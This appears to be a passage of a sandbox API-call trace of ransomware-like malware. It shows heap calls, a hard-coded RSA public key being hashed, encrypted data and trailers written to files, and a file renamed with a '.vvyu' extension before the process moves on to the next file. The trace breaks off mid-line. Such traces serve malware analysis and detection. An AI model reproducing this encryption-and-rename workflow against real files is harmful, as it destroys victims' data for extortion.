[0202.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0202.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0202.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0202.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0202.995] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0202.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0202.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3728 | out: hHeap=0x620000) returned 1 [0202.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0202.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3710 | out: hHeap=0x620000) returned 1 [0202.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0202.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3770 | out: hHeap=0x620000) returned 1 [0202.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0202.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0202.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0202.997] GetCurrentThreadId () returned 0x66c [0202.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0202.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea9798 [0202.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0202.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0202.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0202.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0202.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0202.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0202.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.997] GetCurrentThreadId () returned 0x66c [0202.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x66c990 [0202.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0202.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0202.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x66c990 | out: hHeap=0x620000) returned 1 [0202.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0202.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0202.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaf50 [0202.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0202.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0202.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0202.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3770 [0202.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0202.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0202.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0202.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0202.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0202.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0202.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0202.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0202.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3710 [0202.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0202.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0203.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0203.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0203.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0203.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0203.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0203.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3728 [0203.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0203.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0203.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0203.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36f8 [0203.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0203.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3788 [0203.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0203.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0203.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0203.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3758 [0203.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0203.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3740 [0203.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0203.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea37a0 [0203.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3740 | out: hHeap=0x620000) returned 1 [0203.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3740 [0203.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3758 | out: hHeap=0x620000) returned 1 [0203.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0203.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0203.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0203.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0203.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0203.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3710 | out: hHeap=0x620000) returned 1 [0203.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3710 [0203.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0203.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0203.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3770 | out: hHeap=0x620000) returned 1 [0203.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0203.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37a0 | out: hHeap=0x620000) returned 1 [0203.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0203.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0203.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0203.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0203.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0203.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3710 | out: hHeap=0x620000) returned 1 [0203.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0203.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0203.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0203.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0203.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0203.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0203.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0203.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0203.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0203.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0203.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0203.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0203.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3740 | out: hHeap=0x620000) returned 1 [0203.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0203.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3788 | out: hHeap=0x620000) returned 1 [0203.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0203.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3728 | out: hHeap=0x620000) returned 1 [0203.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36f8 | out: hHeap=0x620000) returned 1 [0203.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0203.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0203.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0203.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea36e0 | out: hHeap=0x620000) returned 1 [0203.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1d98 | out: hHeap=0x620000) returned 1 [0203.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0203.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0203.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0203.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0203.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0203.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0203.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0203.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0203.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0203.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0203.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0203.009] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0xc089, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0xc089, lpOverlapped=0x0) returned 1 [0203.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0203.010] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xc08e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.010] WriteFile (in: hFile=0x510, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0203.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0203.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4930 [0203.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0203.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0203.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0203.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4930 | out: hHeap=0x620000) returned 1 [0203.011] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0203.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0203.012] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.012] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0203.012] CloseHandle (hObject=0x510) returned 1 [0203.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x2ca5e50 [0203.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8d0) returned 0x2ea6a68 [0203.014] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ca5e50 | out: hHeap=0x620000) returned 1 [0203.014] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\rQja5oZ7_uz\\EhqiUu8LglRl.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\rqja5oz7_uz\\ehqiuu8lglrl.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\rQja5oZ7_uz\\EhqiUu8LglRl.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\rqja5oz7_uz\\ehqiuu8lglrl.mp4.vvyu")) returned 1 [0203.016] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.016] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.016] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.019] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0203.019] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6612ed0, ftCreationTime.dwHighDateTime=0x1d89f97, ftLastAccessTime.dwLowDateTime=0x417a65d0, ftLastAccessTime.dwHighDateTime=0x1d8a4c6, ftLastWriteTime.dwLowDateTime=0x417a65d0, ftLastWriteTime.dwHighDateTime=0x1d8a4c6, nFileSizeHigh=0x0, nFileSizeLow=0x5eec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kyLqCYn6yV.pps", cAlternateFileName="KYLQCY~1.PPS")) returned 1 [0203.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c24570 [0203.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xee) returned 0x2c73318 [0203.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c24570 | out: hHeap=0x620000) returned 1 [0203.020] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\rQja5oZ7_uz\\kyLqCYn6yV.pps") returned=".pps" [0203.020] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\UovhOsbqK0eMsW0c\\rQja5oZ7_uz\\kyLqCYn6yV.pps" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\uovhosbqk0emsw0c\\rqja5oz7_uz\\kylqcyn6yv.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0203.020] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=24300) returned 1 [0203.020] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0203.023] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x5ec6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.023] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0203.027] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0203.027] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.028] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0203.028] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x5eec, lpOverlapped=0x0) returned 1 [0203.028] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.028] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0203.028] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.028] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.029] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0203.030] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0203.030] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0203.030] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0203.030] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0203.030] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0203.030] GetLastError () returned 0x0 [0203.030] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0203.030] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0203.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0203.032] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0203.032] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0203.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0203.032] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0203.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0203.032] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5ef0) returned 0x2ea99b0 [0203.032] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0203.033] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0203.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0203.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0203.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0203.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0203.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1d98 [0203.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36e0 [0203.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1de0 [0203.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea36f8 [0203.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3728 [0203.033] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) 